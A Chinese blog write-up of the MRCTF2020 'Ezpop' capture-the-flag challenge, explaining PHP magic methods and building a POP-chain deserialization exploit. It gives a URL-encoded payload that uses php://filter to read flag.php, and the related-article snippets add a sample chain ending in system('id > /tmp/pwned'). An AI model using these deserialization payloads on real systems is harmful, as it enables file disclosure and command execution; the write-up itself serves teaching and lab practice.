[MRCTF2020]Ezpop 1——pop链的反序列化

最新推荐文章于 2025-04-13 23:07:30 发布
最新推荐文章于 2025-04-13 23:07:30 发布
阅读量2.5k 收藏 13
点赞数 8
分类专栏: buuctf 文章标签: php web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_62879498/article/details/124710649
版权

[MRCTF2020]Ezpop 1

进入环境,得到源码

Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

首先,一眼看上去 我们的得到两个关键的信息:一是 flag在 flag.php 另一个是存在文件包含。所以,在本关我们可以尝试使用php伪协议 来读取flag。
本关还有一个考点就是 php反序列化之pop链

前面我们做过许多 反序列化的题
在这里我想在简单的说一下 我前面一直没有注意到的点,包括简单总结一下:
在 php 序列化的时候,只是将类名,变量名等的这类东西以字符串的形式保存起来,而方法其实并没有保存起来。所以我们在反序列化的时候也只是 反序列化类名,变量名(反序列化就是一个将字符串还原的过程)。
序列化,就是保存类的基本信息,而反序列化就是读取。虽然我们没有办法字定义危险函数,但却可以利用已有的敏感函数 通过反序列化 来达到我们的目的。
所以 漏洞的关键点就是 序列化与反序列化的过程用户可控
序列化与反序列化漏洞的精髓在与敏感函数利用与类重构。

简单的说一下 pop链的反序列化

pop链的反序列化本质上和我们前面所用的没有区别。无非是这个长点儿。很像链条一样,一环套一环

php代码审计

__invoke()魔术方法:在类的对象被调用为函数时候,自动被调用
__toString()魔术方法:在类的对象被当作字符串操作的时候,自动被调用
__wakeup()魔术方法,在类的对象反序列化的时候,自动被调用
__construct()构造方法:在类的对象实例化之前,自动被调用
__get()魔术方法:从不可访问的属性中读取数据会触发(访问类中一个不存在的属性时自动调用

在pop链的时候,我比较喜欢从结果往回推
我们先看文件包含的函数include,要调用include函数,就要调用append方法,appendde1方法需要__invoke()进行触发。
__invoke()调用的条件就是Modifier被调用为函数的时候
在这里,我们可以利用__get()方法

_get()中的p赋值为Modifier类,那么相当于Modifier类被当作函数处理,所以会调用Modifier类中的_invoke()方法。

而我们可以利用__toString() 返回Show类的属性str中的属性source,但是test中没有source属性 所以成功调用get方法

__toString()直接输出对象引用的时候,不产生报错。快速获取对象的字符串信息的便捷方式。

调用Show类的__toString()方法:就利用Show的__construct方法触发,把source赋值为Show类

所以,我们调用函数的顺序就是:
__construct->__toString()->__get()->__invoke()->append->文件包含

构建payload:

<?php
class Modifier {
    protected  $var='php://filter/read=convert.base64-encode/resource=flag.php';
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

}

class Test{
    public $p;
     public function __get($key){
        $function = $this->p;
        return $function();
    }
}

$a= new Show();
$file='index.php';
$a->source=new Show();
$a->source->str=new Test();
$a->source->str->p=new Modifier();

对我们的函数进行序列化
这里可以使用网站进行转换:推荐网址

在这里插入图片描述

paylaod:

/index.php?pop=
O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Bs%3A9%3A%22index.php%22%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D

在这里插入图片描述
在这里插入图片描述

[MRCTF2020]Ezpop-1|php序列化
「 虚幻私塾」
06-30 546
1、打开题目获取到源代码信息,如下: 2、我们的最终目标是获取flag.php中的flag信息,因此分析源代码信息,查看哪里可以获取到flag.php文件,发现在Modifier类中存在include($value),因此想到可以通过php伪协议来获取flag.php的信息,所以现在我们的目的就成了调用append函数,接着往下观察,发现__invoke函数调用了append函数,因此我们只要执行了__invoke函数一样可以获得flag信息,那该怎么执行__invoke函数呢:因此,此时我们应该使用别的函
【buuctf】MRCTF2020-Ezpop小白详解
m0_73860001的博客
03-15 1374
真的很详细
[MRCTF2020]Ezpop 1
plant1234的博客
04-16 1627
[MRCTF2020]Ezpop 1 首先打开题目得到: 对源码进行分析: <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Crack It! class Modifier { protected
[MRCTF2020]ezpop wp
最新发布
2303_80867263的博客
04-13 940
本题考点:php反序列化pop 首先来了解一下pop是什么,它类似于多米诺骨牌一环套一环,要调用这个成员方法然后去找能调用这个方法的魔术方法,最后一环接一环,完成一个子,最终形成payload。 那么来了解一下这些魔术方法 __construct()            //类的构造函数,创建对象时触发(new 对象()) __destruct()             //类的析构函数,对象被销毁时触发(调用完后就会触发)(反序列化调用对象时也会触发) __call()          
BUUCTF-[MRCTF2020]Ezpop
qwsn
11-19 2679
0x01Web 1.BUUCTF-[MRCTF2020]Ezpop 第一步:开启题目环境 图略 第二步:访问接,发现一段php代码 Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%
Buu [MRCTF2020]Ezpop1
Lakers248_的博客
05-08 744
解题思路
ThinkPHP 6.x反序列化POP(一)1
08-03
本文将详细探讨ThinkPHP 6.x版本中的一个特定安全问题——反序列化POP的利用,帮助开发者理解和防范此类攻击。 首先,我们了解什么是反序列化POP反序列化是将序列化的对象恢复成原生的PHP对象的过程,而POP...
适合新手的php反序列化pop构建思路和原理(有例题,无echo调用tostring)
2301_76690905的博客
10-24 1544
对于这个pop的执行过程,可以进一步详细解释。首先,让我们逐步追踪反序列化的过程:反序列化开始时,会先对最内层的对象a进行反序列化,即将‘a进行反序列化,即将‘var_1属性赋值为字符串然后,对对象d进行反序列化,它的‘d进行反序列化,它的‘p__get()`函数,返回对象$a的结果。接下来是对象c的反序列化,其中‘c的反序列化,其中‘z__get()__get()`函数,将对象a返回给对象a返回给对象c。最后,对对象b进行反序列化,它的‘b进行反序列化,它的‘q__wakeup()函数。
二叉树的序列化和反序列化——C++
净无邪博客
12-15 2727
总体解题思想为先用层次遍历存储包括空节点的每个节点,存储是每个节点都存储左右子节点,如果节点为空,则存储"#,",否则存储节点的值val,同时用逗号','分割每个节点内容,存储完后进行序列化string。反序列化则先按逗号','分割每个字符串为数组字符串vector<string> valStrArr,该valStrArr存储每个节点的值,包括空节点;然后遍历valStrArr,反向构建原始二叉树。反向构建二叉树时由于存储是按层次遍历存入的,所以反向遍历时也需要按照层次遍历依次将非空节点压栈和弹出栈。由于层
ctfshow——反序列化
qq_55202378的博客
02-26 1119
不要相等即可,注意GET传参时也要做修改。这里就是使用GET传输,username赋值为。变量进行反序列化,因此只需要GET传输的变量。以上一题相比,其实就是反序列化的类中的变量。,注意需要对user的值进行URL编码。,password也1赋值为。相等,且反序列化后的。
[MRCTF2020]Ezpop 1 (小白能看懂)
saltwy的博客
12-07 595
接下来开始推力,当我们传入一个序列化进去,会自动执行_wakeup()函数,它将属性source传入正则匹配函数preg_match(),所以这里source被当作字符串处理。可以这样理解有没有传入名为pop的参数,如果i没有则创建一个Show类的对象$a,highlight_file()用于显示指定文件的源代码,_FILE_表达的是当前文件。这里提到了_invoke()魔术方法,记一下,当你调用一个对象时,_invoke()方法会被自动调用。来理解一下_construce()和to_String()
BUUCTF [MRCTF2020]Ezpop 1
weixin_45642610的博客
04-21 1497
BUUCTF [MRCTF2020]Ezpop 1 Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Crack It! class Modifier { pr
[MRCTF2020]Ezpop1
kw741951的博客
08-05 1252
/这里urlencode是为了防止 protected 对象对结果造成影响。调用invoke魔术方法需要将对象当做一个函数来使用,这样invoke方法就会自动调用。,然后成功调用invoke魔术方法就可以读出flag。果我们把modifiy对象的var改为。一看base64编码。
BUUCTF闯关日记--[MRCTF2020]Ezpop1
qq_64201116的博客
05-14 709
进入页面,熟悉的代码审计 提示了flag.php <?php class Modifier { protected $var; public function append($value){ include($value); } public function __invoke(){ $this->append($this->var); } } class Show{ public $sourc.
BUUCTF [MRCTF2020]Ezpop1反序列化漏洞 CTF-Web
m0_72904009的博客
06-04 491
BUUCTF [MRCTF2020]Ezpop1反序列化漏洞
MRCTF2020」- Ezpop
ro4lsc的博客
05-14 3542
MRCTF2020」- Ezpop 做了一个星期的反序列化,不知道为啥,概念从模糊到清晰再到模糊,看来还是基础不扎实导致的,所以就有了这一篇文章的诞生,思路的一个整理以及POP的构造需要再熟悉熟悉 俗话说的好,有ez的题目都不ez,那么这个题同样也不ez 重新复习一下php里面反序列化序列化的几大魔术方法 __destruct(类执行完毕以后调用,其最主要的作用是拿来做垃圾回收机制。) __construct(类一执行就开始调用,其作用是拿来初始化一些值。) __toString(在对象当做字符串的
web buuctf [MRCTF2020]Ezpop1
weixin_44214568的博客
04-07 657
知识点:1.魔法函数 2.文件包含漏洞 1.开题,php代码审计 Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Cr...
php序列化与反序列化pop
03-14
<think>好的,我现在需要帮助用户理解PHP反序列化POP攻击原理和实现方式。首先,我得回顾一下PHP序列化和反序列化的基础知识。序列化是将对象转换为字符串,以便存储或传输,反序列化则是将这些字符串重新转换为对象。在这个过程中,如果攻击者能够控制反序列化的数据,就可能触发一些恶意行为。 接下来,POP攻击的关键在于利用类中的魔术方法。魔术方法如__destruct、__wakeup等,在对象生命周期的特定时刻会被自动调用。攻击者需要找到这些方法的调用,使得在反序列化过程中依次触发这些方法,最终执行恶意代码。例如,__destruct方法可能调用某个方法,而该方法又调用另一个存在漏洞的方法,形成式调用。 现在,我需要考虑如何构造一个具体的示例。比如,假设有一个类Example类,它的__destruct方法会调用$this->handler->close()。如果handler是另一个类FileManager的实例,而FileManager的close方法中有执行系统命令的代码,那么攻击者可以通过构造特定的序列化数据,将handler指向FileManager,并设置要执行的命令,从而在反序列化时触发命令执行。 然后,根据用户提供的引用,特别是引用[4]提到的POP的概念,需要将各个类的属性和方法串联起来。引用[2]提到处理protected和private属性时需要进行URL编码,避免解析错误。所以在构造序列化字符串时,需要注意这些格式问题,确保payload正确。 还要考虑漏洞利用的实际场景,比如反序列化入口点可能出现在Cookie、Session或数据传输中。攻击者需要找到这些入口,并注入恶意序列化数据。引用[5]中的例子涉及利用TemplatesImpl类,说明实际应用中可能会调用某些存在危险方法的类。 最后,我需要整理这些思路,分步骤解释POP的构造过程,并给出一个代码示例,展示如何序列化恶意对象,并处理属性修饰符的问题。同时,生成相关问题,帮助用户进一步深入学习。</think>### PHP反序列化POP攻击原理及实现方式 #### 1. 核心机制 PHP反序列化POP攻击的核心在于**利用类的魔术方法(Magic Methods)和对象属性之间的调用关系**,构造一条从反序列化触发点到危险函数的调用(Property-Oriented Programming Chain)[^4]。当恶意构造的序列化数据被反序列化时,会自动触发这些魔术方法,最终执行攻击者预设的代码。 #### 2. 关键步骤 1. **魔术方法触发** 常见触发点包括: - `__destruct()`:对象销毁时触发 - `__wakeup()`:反序列化时触发 - `__toString()`:对象被当作字符串使用时触发 2. **调用构造** 通过控制对象属性,使一个魔术方法调用另一个类的方法,形成式调用。例如: ``` A::__destruct() -> B::save() -> C::exec() ``` 3. **危险函数调用** 最终触发如`system()`、`eval()`、`file_put_contents()`等函数。 #### 3. 示例漏洞利用 假设存在以下三个类: ```php class FileManager { private $cmd; public function __construct($cmd) { $this->cmd = $cmd; } public function save() { system($this->cmd); // 危险函数 } } class Logger { public $handler; public function close() { $this->handler->save(); } } class Example { protected $obj; public function __destruct() { $this->obj->close(); // 触发点 } } ``` **攻击构造过程**: 1. 通过`Example::__destruct()`触发`Logger::close()` 2. `Logger::close()`调用`FileManager::save()` 3. `FileManager::save()`执行系统命令 **序列化payload生成**: ```php $file = new FileManager("id > /tmp/pwned"); $logger = new Logger(); $logger->handler = $file; $exp = new Example(); $exp->obj = $logger; // 处理protected属性格式 $payload = str_replace( ["\0*\0", "\0Example\0"], ['\00*\00','\00Example\00'], serialize($exp) ); echo urlencode($payload); // 需URL编码处理特殊字符[^2] ``` #### 4. 漏洞利用条件 1. 存在可被控制的反序列化入口(如`unserialize($_COOKIE['data'])`) 2. 目标代码中包含包含危险方法的类 3. 类之间存在可串联的调用关系
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值